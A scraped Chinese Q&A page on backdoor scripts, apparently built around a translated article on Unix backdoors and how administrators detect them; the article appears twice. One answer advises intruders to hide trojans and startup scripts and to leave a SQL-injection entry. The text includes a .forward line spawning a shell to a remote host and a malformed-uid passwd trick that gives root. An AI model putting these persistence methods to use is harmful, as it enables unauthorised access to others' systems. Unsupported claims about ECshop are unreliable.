後門腳本
① 如何給webshell添加後門!求具體常式!麻煩各位了!
這個例子還真不好說,關鍵是留後門的前提是你已經入侵進去了或者本身代碼就是你提供的。如果是這樣那方法有一下可用:
放置一個muma程序在一個比較深的目錄,當然muma有你想實現的功能;
放置一個腳本在一個比較深的目錄,其實和1一樣,只不過腳本的話更不容易被發現,腳本內容你隨便寫啦,比如打開某個埠啊,外傳某個文件啊,最後別忘了加開機啟動;
最後一點嘛,如果你有操作代碼的許可權,那麼,留個sql-injec入口,當然啦,找個比較隱秘的頁面留,這樣不容易被發現。
② 什麼是後門程序
什麼是後門?
從早期的計算機入侵者開始,他們就努力發展能使自己重返被入侵系統的技術或後門.本文將討論許多常見的後門及其檢測方法. 更多的焦點放在Unix系統的後門,同時討論一些未來將會出現的Windows NT的後門. 本文將描述如何測定入侵者使用的方法這樣的復雜內容和管理員如何防止入侵者重返的基礎知識. 當管理員懂的一旦入侵者入侵後要制止他們是何等之難以後, 將更主動於預防第一次入侵. 本文試圖涉及大量流行的初級和高級入侵者製作後門的手法, 但不會也不可能覆蓋到所有可能的方法.
大多數入侵者的後門實現以下二到三個目的:
即使管理員通過改變所有密碼類似的方法來提高安全性,仍然能再次侵入. 使再次侵入被發現的可能性減至最低.大多數後門設法躲過日誌, 大多數情況下即使入侵者正在使用系統也無法顯示他已在線. 一些情況下, 如果入侵者認為管理員可能會檢測到已經安裝的後門, 他們以系統的 脆弱性作為唯一的後門, 重而反復攻破機器. 這也不會引起管理員的注意. 所以在 這樣的情況下,一台機器的脆弱性是它唯一未被注意的後門.
密碼破解後門
這是入侵者使用的最早也是最老的方法, 它不僅可以獲得對Unix機器的訪問, 而且可以通過破解密碼製造後門. 這就是破解口令薄弱的帳號. 以後即使管理員封了入侵者的當前帳號,這些新的帳號仍然可能是重新侵入的後門. 多數情況下, 入侵者尋找口令薄弱的未使用帳號,然後將口令改的難些. 當管理員尋找口令薄弱的帳號是, 也不會發現這些密碼已修改的帳號.因而管理員很難確定查封哪個帳號.
Rhosts + + 後門
在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts文件里的主機名使用簡單的認證方法. 用戶可以輕易的改變設置而不需口令就能進入. 入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +", 就可以允許任何人從任何地方無須口令便能進入這個帳號. 特別當home目錄通過NFS向外共享時, 入侵者更熱中於此. 這些帳號也成了入侵者再次侵入的後門. 許多人更喜歡使用Rsh, 因為它通常缺少日誌能力. 許多管
理員經常檢查 "+ +", 所以入侵者實際上多設置來自網上的另一個帳號的主機名和用戶名,從而不易被發現.
校驗和及時間戳後門
早期,許多入侵者用自己的trojan程序替代二進制文件. 系統管理員便依*時間戳和系統校驗和的程序辨別一個二進制文件是否已被改變, 如Unix里的sum程序. 入侵者又發展了使trojan文件和原文件時間戳同步的新技術. 它是這樣實現的: 先將系統時鍾撥回到原文件時間, 然後調整trojan文件的時間為系統時間. 一旦二進制trojan文件與原來的精確同步, 就可以把系統時間設回當前時間. sum程序是基於CRC校驗, 很容易
騙過.入侵者設計出了可以將trojan的校驗和調整到原文件的校驗和的程序. MD5是被大多數人推薦的,MD5使用的演算法目前還沒人能騙過.
Login後門
在Unix里,login程序通常用來對telnet來的用戶進行口令驗證. 入侵者獲取login.c的原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令. 如果用戶敲入後門口令,它將忽視管理員設置的口令讓你長驅直入. 這將允許入侵者進入任何帳號,甚至是root.由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmp前產生一個訪問的, 所以入侵者可以登錄獲取shell卻不會暴露該帳號. 管理員注意到這種後門後, 便
用"strings"命令搜索login程序以尋找文本信息. 許多情況下後門口令會原形畢露.入侵者就開始加密或者更好的隱藏口令, 使strings命令失效. 所以更多的管理員是用MD5校驗和檢測這種後門的.
Telnetd後門
當用戶telnet到系統, 監聽埠的inetd服務接受連接隨後遞給in.telnetd,由它運行login.一些入侵者知道管理員會檢查login是否被修改, 就著手修改in.telnetd.在in.telnetd內部有一些對用戶信息的檢驗, 比如用戶使用了何種終端. 典型的終端設置是Xterm或者VT100.入侵者可以做這樣的後門, 當終端設置為"letmein"時產生一個不要任何驗證的shell. 入侵者已對某些服務作了後門, 對來自特定源埠的連接產
生一個shell .
服務後門
幾乎所有網路服務曾被入侵者作過後門. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本隨處多是. 有的只是連接到某個TCP埠的shell,通過後門口令就能獲取訪問.這些程序有時用刺媧□?ucp這樣不用的服務,或者被加入inetd.conf作為一個新的服務.管理員應該非常注意那些服務正在運行, 並用MD5對原服務程序做校驗.
Cronjob後門
Unix上的Cronjob可以按時間表調度特定程序的運行. 入侵者可以加入後門shell程序使它在1AM到2AM之間運行,那麼每晚有一個小時可以獲得訪問. 也可以查看cronjob中經常運行的合法程序,同時置入後門.
庫後門
幾乎所有的UNIX系統使用共享庫. 共享庫用於相同函數的重用而減少代碼長度. 一些入侵者在象crypt.c和_crypt.c這些函數里作了後門. 象login.c這樣的程序調用了crypt(),當使用後門口令時產生一個shell. 因此, 即使管理員用MD5檢查login程序,仍然能產生一個後門函數.而且許多管理員並不會檢查庫是否被做了後門.對於許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗. 有一種辦法是入侵者對open()和文件訪問函數做後門. 後門函數讀原文件但執行trojan後門程序. 所以 當MD5讀這些文件時,校驗和一切正常. 但當系統運行時將執行trojan版本的. 即使trojan庫本身也可躲過MD5校驗. 對於管理員來說有一種方法可以找到後門, 就是靜態編連MD5校驗程序然後運行.靜態連接程序不會使用trojan共享庫.
內核後門
內核是Unix工作的核心. 用於庫躲過MD5校驗的方法同樣適用於內核級別,甚至連靜態連接多不能識別. 一個後門作的很好的內核是最難被管理員查找的, 所幸的是內核的後門程序還不是隨手可得, 每人知道它事實上傳播有多廣.
文件系統後門
入侵者需要在伺服器上存儲他們的掠奪品或數據,並不能被管理員發現. 入侵者的文章常是包括exploit腳本工具,後門集,sniffer日誌,email的備分,原代碼,等等. 有時為了防止管理員發現這么大的文件, 入侵者需要修補"ls","","fsck"以隱匿特定的目錄和文件.在很低的級別, 入侵者做這樣的漏洞: 以專有的格式在硬碟上割出一部分,且表示為壞的扇區. 因此入侵者只能用特別的工具訪問這些隱藏的文件. 對於普通的
管理員來說, 很難發現這些"壞扇區"里的文件系統, 而它又確實存在.
Boot塊後門
在PC世界裡,許多病毒藏匿與根區, 而殺病毒軟體就是檢查根區是否被改變. Unix下,多數管理員沒有檢查根區的軟體, 所以一些入侵者將一些後門留在根區.
隱匿進程後門
入侵者通常想隱匿他們運行的程序. 這樣的程序一般是口令破解程序和監聽程序 (sniffer).有許多辦法可以實現,這里是較通用的: 編寫程序時修改自己的argv[]使它看起來象其他進程名. 可以將sniffer程序改名類似in.syslog再執行. 因此當管理員用"ps"檢查運行進程時, 出現 的是標准服務名. 可以修改庫函數致使
"ps"不能顯示所有進程. 可以將一個後門或程序嵌入中斷驅動程序使它不會在進程表顯現. 使用這個技術的一個後門例子是amod.tar.gz :
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html
也可以修改內核隱匿進程.
Rootkit
最流行的後門安裝包之一是rootkit. 它很容易用web搜索器找到.從Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.
網路通行後門
入侵者不僅想隱匿在系統里的痕跡, 而且也要隱匿他們的網路通行. 這些網路通行後門有時允許入侵者通過防火牆進行訪問. 有許多網路後門程序允許入侵者建立某個埠號並不用通過普通服務就能實現訪問. 因為這是通過非標准網路埠的通行, 管理員可能忽視入侵者的足跡. 這種後門通常使用TCP,UDP和ICMP, 但也可能是其他類型報文.
TCP Shell 後門
入侵者可能在防火牆沒有阻塞的高位TCP埠建立這些TCP Shell後門. 許多情況下,他們用口令進行保護以免管理員連接上後立即看到是shell訪問. 管理員可以用netstat命令查看當前的連接狀態, 那些埠在偵聽, 目前連接的來龍去脈. 通常這些後門可以讓入侵者躲過TCP Wrapper技術. 這些後門可以放在SMTP埠, 許多防火牆允許e-mail通行的.
UDP Shell 後門
管理員經常注意TCP連接並觀察其怪異情況, 而UDP Shell後門沒有這樣的連接, 所以netstat不能顯示入侵者的訪問痕跡. 許多防火牆設置成允許類似DNS的UDP報文的通行. 通常入侵者將UDP Shell放置在這個埠, 允許穿越防火牆.
ICMP Shell 後門
Ping是通過發送和接受ICMP包檢測機器活動狀態的通用辦法之一. 許多防火牆允許外界ping它內部的機器. 入侵者可以放數據入Ping的ICMP包, 在ping的機器間形成一個shell通道. 管理員也許會注意到Ping包暴風, 但除了他查看包內數據, 否者入侵者不會暴露.
加密連接
管理員可能建立一個sniffer試圖某個訪問的數據, 但當入侵者給網路通行後門加密後,就不可能被判定兩台機器間的傳輸內容了.
Windows NT
由於Windows NT不能輕易的允許多個用戶象Unix下訪問一台機器, 對入侵者來說就很難闖入Windows NT,安裝後門,並從那裡發起攻擊. 因此你將更頻繁地看到廣泛的來自Unix的網路攻擊. 當Windows NT提高多用戶技術後, 入侵者將更頻繁地利用 WindowsNT.如果這一天真的到來, 許多Unix的後門技術將移植到Windows NT上, 管理員可以等候入侵者的到來. 今天, Windows NT已經有了telnet守護程序. 通過網路通行後門, 入侵者發現在Windows NT安裝它們是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此處該如何翻譯? :(
解決
當後門技術越先進, 管理員越難於判斷入侵者是否侵入後者他們是否被成功封殺.
評估
首先要做的是積極准確的估計你的網路的脆弱性, 從而判定漏洞的存在且修復之.許多商業工具用來幫助掃描和查核網路及系統的漏洞. 如果僅僅安裝提供商的安全補丁的話,許多公司將大大提高安全性.
MD5基準線
一個系統(安全)掃描的一個重要因素是MD5校驗和基準線. MD5基準線是在黑客入侵前由干凈系統建立. 一旦黑客入侵並建立了後門再建立基準線, 那麼後門也被合並進去了.一些公司被入侵且系統被安置後門長達幾個月.所有的系統備份多包含了後門. 當公司發現有黑客並求助備份祛除後門時, 一切努力是徒勞的, 因為他們恢復系統的同時也恢復了後門. 應該在入侵發生前作好基準線的建立.
入侵檢測
隨著各種組織的上網和允許對自己某些機器的連接,入侵檢測正變的越來越重要.以前多數入侵檢測技術是基於日誌型的. 最新的入侵檢測系統技術(IDS)是基於實時偵聽和網路通行安全分析的. 最新的IDS技術可以瀏覽DNS的UDP報文, 並判斷是否符合DNS協議請求. 如果數據不符合協議, 就發出警告信號並抓取數據進行進一步分析. 同樣的原則可以運用到ICMP包, 檢查數據是否符合協議要求, 或者是否裝載加密shell會話.
從CD-ROM啟動
一些管理員考慮從CD-ROM啟動從而消除了入侵者在CD-ROM上做後門的可能性.這種方法的問題是實現的費用和時間夠企業面臨的.
警告
由於安全領域變化之快, 每天有新的漏洞被公布, 而入侵者正不斷設計新的攻擊和安置後門技術, 安枕無憂的安全技術是沒有的.請記住沒有簡單的防禦,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句該如何翻譯? :( )
-------------------------------------------------------------------------
you may want to add:
.forward Backdoor
On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
&nbs>
the client and server).
> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).
你也許要增加:
.forward後門
Unix下在.forward文件里放入命令是重新獲得訪問的常用方法. 帳戶'username'的.forward可能設置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"
這種方法的變形包括改變系統的mail的別名文件(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現在標准輸入執行任意命令(小部分預處理後).>利用smrsh可以有效的制止這種後門(雖然如果允許可以自運行的elm's filter或 procmail>類程序, 很有可能還有問題 ......)
( 此段的內容理解不深, 故付上英文, 請指教! )
---------------------------------------------------------------------------
你也許能用這個"特性"做後門:
當在/etc/password里指定一個錯誤的uid/gid後, 大多數login(1)的實現是不能檢查出這個錯誤的uid/gid, 而atoi(3)將設uid/gid為0, 便給了超級用戶的權利.
例子:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
③ 什麼是後門程序
後門程序一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。在軟體的開發階段,程序員常常會在軟體內創建後門程序以便可以修改程序設計中的缺陷。但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。 與木馬的關系 後門程序,跟我們通常所說的"木馬"有聯系也有區別. 聯系在於:都是隱藏在用戶系統中向外發送信息,而且本身具有一定許可權,以便遠程機器對本機的控制. 區別在於:木馬是一個完整的軟體,而後門則體積較小且功能都很單一. 而且,在病毒命名中,後門一般帶有backdoor字樣,而木馬一般則是trojan字樣. 具體含義後門程序又稱特洛依木馬,其用途在於潛伏在電腦中,從事搜集信息或便於黑客進入的動作。後門程序和電腦病毒最大的差別,在於後門程序不一定有自我復制的動作,也就是後門程序不一定會「感染」其它電腦。 後門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。 後門的類型後門包括從簡單到奇特,有很多的類型。簡單的後門可能只是建立一個新的賬號,或者接管一個很少使用的賬號;復雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序,你當輸入特定的密碼時,你就能以管理員的許可權來存取系統。 後門能相互關聯,而且這個 技術被許多黑客所使用。例如,黑客可能使用密碼破解一個或多個賬號密碼,黑客可能會建立一個或多個賬號。一個黑客可以存取這個系統,黑客可能使用一些 技術或利用系統的某個漏洞來提升許可權。黑客可能使用一些技術或利用系統的某個漏洞來提升許可權。黑客可能會對系統的配置文件進行小部分的修改,以降低系統的防衛性能。也可能會安裝一個木馬程序,使系統打開一個安全漏洞,以利於黑客完全掌握系統。 以上是在網路上常見的對「後門」的解釋,其實我們可以用很簡單的一句話來概括它:後門就是留在計算機系統中,供某位特殊使用都通過某種特殊方式控制計算機系統的途徑!——很顯然,掌握好後門技術是每個網路安全愛好者不可或缺的一項基本技能!它能讓你牢牢抓住肉雞,讓它永遠飛不出你的五指山! 下文將以筆者從事網路安全多年的工作經驗為基礎,給廣大的網路初級安全愛好者講解一些網路上常 用的後門的種類和使用方法以及技巧,希望大家能在最短的時間內學習到最好的技術,提升自己的網路安全技術水平! 後門的分類後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法:網頁後門此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如現在非常流行的ASP、cgi腳本後門等。 線程插入後門 利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。 擴展後門所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常駐見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫郭後門「隱蔽」的初衷,具體看法就看各位使用都的喜好了。 c/s後門和傳統的木馬程序類似的控制方法,採用「客記端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
④ 阿里雲被提示網站後門-發現後門(Webshell)文件
阿里雲的ecs伺服器雲盾安全提示發現webshell後門文件,是因為網站有漏洞導致被黑客上傳了了腳本後門也就是webshell後門,如果對程序代碼熟悉的話可以自行修復,網站漏洞的修補與木馬後門的清除,需要很多專業的知識,也不僅僅是知識,還需要大量的經驗積累,所以從做網站到維護網站,維護伺服器,盡可能找專業的網站安全公司來解決問題,國內也就Sinesafe和綠盟、啟明星辰等安全公司比較專業.
⑤ 什麼是後門怎麼才能發現一款軟體有後門
當一個訓練有素的程序員設計一個功能較復雜的軟體時,都習慣於先將整個軟體分割為若干模塊,然後再對各模塊單獨設計、調試,而後門則是一個模塊的秘密入口。在程序開發期間,後門的存在是為了便於測試、更改和增強模塊的功能。當然,程序員一般不會把後門記入軟體的說明文檔,因此用戶通常無法了解後門的存在。
/按照正常操作程序,在軟體交付用戶之前,程序員應該去掉軟體模塊中的後門,但是,由於程序員的疏忽,或者故意將其留在程序中以便日後可以對此程序進行隱蔽的訪問,方便測試或維護已完成的程序等種種原因,實際上並未去掉。
這樣,後門就可能被程序的作者所秘密使用,也可能被少數別有用心的人用窮舉搜索法發現利用。
http://cache..com/c?word=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=http%3A//www%2Exiaom%2Ecom/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=
什麼是後門?
從早期的計算機入侵者開始,他們就努力發展能使自己重返被入侵系統的技術或後門.本文將討論許多常見的後門及其檢測方法. 更多的焦點放在Unix系統的後門,同時討論一些未來將會出現的Windows NT的後門. 本文將描述如何測定入侵者使用的方法這樣的復雜內容和管理員如何防止入侵者重返的基礎知識. 當管理員懂的一旦入侵者入侵後要制止他們是何等之難以後, 將更主動於預防第一次入侵. 本文試圖涉及大量流行的初級和高級入侵者製作後門的手法, 但不會也不可能覆蓋到所有可能的方法.
大多數入侵者的後門實現以下二到三個目的:
即使管理員通過改變所有密碼類似的方法來提高安全性,仍然能再次侵入. 使再次侵入被發現的可能性減至最低.大多數後門設法躲過日誌, 大多數情況下即使入侵者正在使用系統也無法顯示他已在線. 一些情況下, 如果入侵者認為管理員可能會檢測到已經安裝的後門, 他們以系統的 脆弱性作為唯一的後門, 重而反復攻破機器. 這也不會引起管理員的注意. 所以在 這樣的情況下,一台機器的脆弱性是它唯一未被注意的後門.
密碼破解後門
這是入侵者使用的最早也是最老的方法, 它不僅可以獲得對Unix機器的訪問, 而且可以通過破解密碼製造後門. 這就是破解口令薄弱的帳號. 以後即使管理員封了入侵者的當前帳號,這些新的帳號仍然可能是重新侵入的後門. 多數情況下, 入侵者尋找口令薄弱的未使用帳號,然後將口令改的難些. 當管理員尋找口令薄弱的帳號是, 也不會發現這些密碼已修改的帳號.因而管理員很難確定查封哪個帳號.
Rhosts + + 後門
在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts文件里的主機名使用簡單的認證方法. 用戶可以輕易的改變設置而不需口令就能進入. 入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +", 就可以允許任何人從任何地方無須口令便能進入這個帳號. 特別當home目錄通過NFS向外共享時, 入侵者更熱中於此. 這些帳號也成了入侵者再次侵入的後門. 許多人更喜歡使用Rsh, 因為它通常缺少日誌能力. 許多管
理員經常檢查 "+ +", 所以入侵者實際上多設置來自網上的另一個帳號的主機名和用戶名,從而不易被發現.
校驗和及時間戳後門
早期,許多入侵者用自己的trojan程序替代二進制文件. 系統管理員便依*時間戳和系統校驗和的程序辨別一個二進制文件是否已被改變, 如Unix里的sum程序. 入侵者又發展了使trojan文件和原文件時間戳同步的新技術. 它是這樣實現的: 先將系統時鍾撥回到原文件時間, 然後調整trojan文件的時間為系統時間. 一旦二進制trojan文件與原來的精確同步, 就可以把系統時間設回當前時間. sum程序是基於CRC校驗, 很容易
騙過.入侵者設計出了可以將trojan的校驗和調整到原文件的校驗和的程序. MD5是被大多數人推薦的,MD5使用的演算法目前還沒人能騙過.
Login後門
在Unix里,login程序通常用來對telnet來的用戶進行口令驗證. 入侵者獲取login.c的原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令. 如果用戶敲入後門口令,它將忽視管理員設置的口令讓你長驅直入. 這將允許入侵者進入任何帳號,甚至是root.由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmp前產生一個訪問的, 所以入侵者可以登錄獲取shell卻不會暴露該帳號. 管理員注意到這種後門後, 便
用"strings"命令搜索login程序以尋找文本信息. 許多情況下後門口令會原形畢露.入侵者就開始加密或者更好的隱藏口令, 使strings命令失效. 所以更多的管理員是用MD5校驗和檢測這種後門的.
Telnetd後門
當用戶telnet到系統, 監聽埠的inetd服務接受連接隨後遞給in.telnetd,由它運行login.一些入侵者知道管理員會檢查login是否被修改, 就著手修改in.telnetd.在in.telnetd內部有一些對用戶信息的檢驗, 比如用戶使用了何種終端. 典型的終端設置是Xterm或者VT100.入侵者可以做這樣的後門, 當終端設置為"letmein"時產生一個不要任何驗證的shell. 入侵者已對某些服務作了後門, 對來自特定源埠的連接產
生一個shell .
服務後門
幾乎所有網路服務曾被入侵者作過後門. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本隨處多是. 有的只是連接到某個TCP埠的shell,通過後門口令就能獲取訪問.這些程序有時用刺媧□?ucp這樣不用的服務,或者被加入inetd.conf作為一個新的服務.管理員應該非常注意那些服務正在運行, 並用MD5對原服務程序做校驗.
Cronjob後門
Unix上的Cronjob可以按時間表調度特定程序的運行. 入侵者可以加入後門shell程序使它在1AM到2AM之間運行,那麼每晚有一個小時可以獲得訪問. 也可以查看cronjob中經常運行的合法程序,同時置入後門.
庫後門
幾乎所有的UNIX系統使用共享庫. 共享庫用於相同函數的重用而減少代碼長度. 一些入侵者在象crypt.c和_crypt.c這些函數里作了後門. 象login.c這樣的程序調用了crypt(),當使用後門口令時產生一個shell. 因此, 即使管理員用MD5檢查login程序,仍然能產生一個後門函數.而且許多管理員並不會檢查庫是否被做了後門.對於許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗. 有一種辦法是入侵者對open()和文件訪問函數做後門. 後門函數讀原文件但執行trojan後門程序. 所以 當MD5讀這些文件時,校驗和一切正常. 但當系統運行時將執行trojan版本的. 即使trojan庫本身也可躲過MD5校驗. 對於管理員來說有一種方法可以找到後門, 就是靜態編連MD5校驗程序然後運行.靜態連接程序不會使用trojan共享庫.
內核後門
內核是Unix工作的核心. 用於庫躲過MD5校驗的方法同樣適用於內核級別,甚至連靜態連接多不能識別. 一個後門作的很好的內核是最難被管理員查找的, 所幸的是內核的後門程序還不是隨手可得, 每人知道它事實上傳播有多廣.
文件系統後門
入侵者需要在伺服器上存儲他們的掠奪品或數據,並不能被管理員發現. 入侵者的文章常是包括exploit腳本工具,後門集,sniffer日誌,email的備分,原代碼,等等. 有時為了防止管理員發現這么大的文件, 入侵者需要修補"ls","","fsck"以隱匿特定的目錄和文件.在很低的級別, 入侵者做這樣的漏洞: 以專有的格式在硬碟上割出一部分,且表示為壞的扇區. 因此入侵者只能用特別的工具訪問這些隱藏的文件. 對於普通的
管理員來說, 很難發現這些"壞扇區"里的文件系統, 而它又確實存在.
Boot塊後門
在PC世界裡,許多病毒藏匿與根區, 而殺病毒軟體就是檢查根區是否被改變. Unix下,多數管理員沒有檢查根區的軟體, 所以一些入侵者將一些後門留在根區.
隱匿進程後門
入侵者通常想隱匿他們運行的程序. 這樣的程序一般是口令破解程序和監聽程序 (sniffer).有許多辦法可以實現,這里是較通用的: 編寫程序時修改自己的argv[]使它看起來象其他進程名. 可以將sniffer程序改名類似in.syslog再執行. 因此當管理員用"ps"檢查運行進程時, 出現 的是標准服務名. 可以修改庫函數致使
"ps"不能顯示所有進程. 可以將一個後門或程序嵌入中斷驅動程序使它不會在進程表顯現. 使用這個技術的一個後門例子是amod.tar.gz :
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html
也可以修改內核隱匿進程.
Rootkit
最流行的後門安裝包之一是rootkit. 它很容易用web搜索器找到.從Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.
網路通行後門
入侵者不僅想隱匿在系統里的痕跡, 而且也要隱匿他們的網路通行. 這些網路通行後門有時允許入侵者通過防火牆進行訪問. 有許多網路後門程序允許入侵者建立某個埠號並不用通過普通服務就能實現訪問. 因為這是通過非標准網路埠的通行, 管理員可能忽視入侵者的足跡. 這種後門通常使用TCP,UDP和ICMP, 但也可能是其他類型報文.
TCP Shell 後門
入侵者可能在防火牆沒有阻塞的高位TCP埠建立這些TCP Shell後門. 許多情況下,他們用口令進行保護以免管理員連接上後立即看到是shell訪問. 管理員可以用netstat命令查看當前的連接狀態, 那些埠在偵聽, 目前連接的來龍去脈. 通常這些後門可以讓入侵者躲過TCP Wrapper技術. 這些後門可以放在SMTP埠, 許多防火牆允許e-mail通行的.
UDP Shell 後門
管理員經常注意TCP連接並觀察其怪異情況, 而UDP Shell後門沒有這樣的連接, 所以netstat不能顯示入侵者的訪問痕跡. 許多防火牆設置成允許類似DNS的UDP報文的通行. 通常入侵者將UDP Shell放置在這個埠, 允許穿越防火牆.
ICMP Shell 後門
Ping是通過發送和接受ICMP包檢測機器活動狀態的通用辦法之一. 許多防火牆允許外界ping它內部的機器. 入侵者可以放數據入Ping的ICMP包, 在ping的機器間形成一個shell通道. 管理員也許會注意到Ping包暴風, 但除了他查看包內數據, 否者入侵者不會暴露.
加密連接
管理員可能建立一個sniffer試圖某個訪問的數據, 但當入侵者給網路通行後門加密後,就不可能被判定兩台機器間的傳輸內容了.
Windows NT
由於Windows NT不能輕易的允許多個用戶象Unix下訪問一台機器, 對入侵者來說就很難闖入Windows NT,安裝後門,並從那裡發起攻擊. 因此你將更頻繁地看到廣泛的來自Unix的網路攻擊. 當Windows NT提高多用戶技術後, 入侵者將更頻繁地利用 WindowsNT.如果這一天真的到來, 許多Unix的後門技術將移植到Windows NT上, 管理員可以等候入侵者的到來. 今天, Windows NT已經有了telnet守護程序. 通過網路通行後門, 入侵者發現在Windows NT安裝它們是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此處該如何翻譯? :(
解決
當後門技術越先進, 管理員越難於判斷入侵者是否侵入後者他們是否被成功封殺.
評估
首先要做的是積極准確的估計你的網路的脆弱性, 從而判定漏洞的存在且修復之.許多商業工具用來幫助掃描和查核網路及系統的漏洞. 如果僅僅安裝提供商的安全補丁的話,許多公司將大大提高安全性.
MD5基準線
一個系統(安全)掃描的一個重要因素是MD5校驗和基準線. MD5基準線是在黑客入侵前由干凈系統建立. 一旦黑客入侵並建立了後門再建立基準線, 那麼後門也被合並進去了.一些公司被入侵且系統被安置後門長達幾個月.所有的系統備份多包含了後門. 當公司發現有黑客並求助備份祛除後門時, 一切努力是徒勞的, 因為他們恢復系統的同時也恢復了後門. 應該在入侵發生前作好基準線的建立.
入侵檢測
隨著各種組織的上網和允許對自己某些機器的連接,入侵檢測正變的越來越重要.以前多數入侵檢測技術是基於日誌型的. 最新的入侵檢測系統技術(IDS)是基於實時偵聽和網路通行安全分析的. 最新的IDS技術可以瀏覽DNS的UDP報文, 並判斷是否符合DNS協議請求. 如果數據不符合協議, 就發出警告信號並抓取數據進行進一步分析. 同樣的原則可以運用到ICMP包, 檢查數據是否符合協議要求, 或者是否裝載加密shell會話.
從CD-ROM啟動
一些管理員考慮從CD-ROM啟動從而消除了入侵者在CD-ROM上做後門的可能性.這種方法的問題是實現的費用和時間夠企業面臨的.
警告
由於安全領域變化之快, 每天有新的漏洞被公布, 而入侵者正不斷設計新的攻擊和安置後門技術, 安枕無憂的安全技術是沒有的.請記住沒有簡單的防禦,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句該如何翻譯? :( )
-------------------------------------------------------------------------
you may want to add:
.forward Backdoor
On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
&nbs>
the client and server).
> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).
你也許要增加:
.forward後門
Unix下在.forward文件里放入命令是重新獲得訪問的常用方法. 帳戶'username'的.forward可能設置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"
這種方法的變形包括改變系統的mail的別名文件(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現在標准輸入執行任意命令(小部分預處理後).>利用smrsh可以有效的制止這種後門(雖然如果允許可以自運行的elm's filter或 procmail>類程序, 很有可能還有問題 ......)
參考資料:..com
⑥ 在360安全瀏覽器中按F12彈出一個腳本程序、請問這個腳本是做什麼的、有危險嗎是不是木馬或者後門程序之類
你只要打開360安全瀏覽器的「工具」—「選項」,點擊「快捷鍵」就可以查找這個快捷捷的用途了,希望對你幫助。
⑦ ECshop 是否留有後門或者監視之類的腳本
有,,假開源
⑧ 後門程序的分類
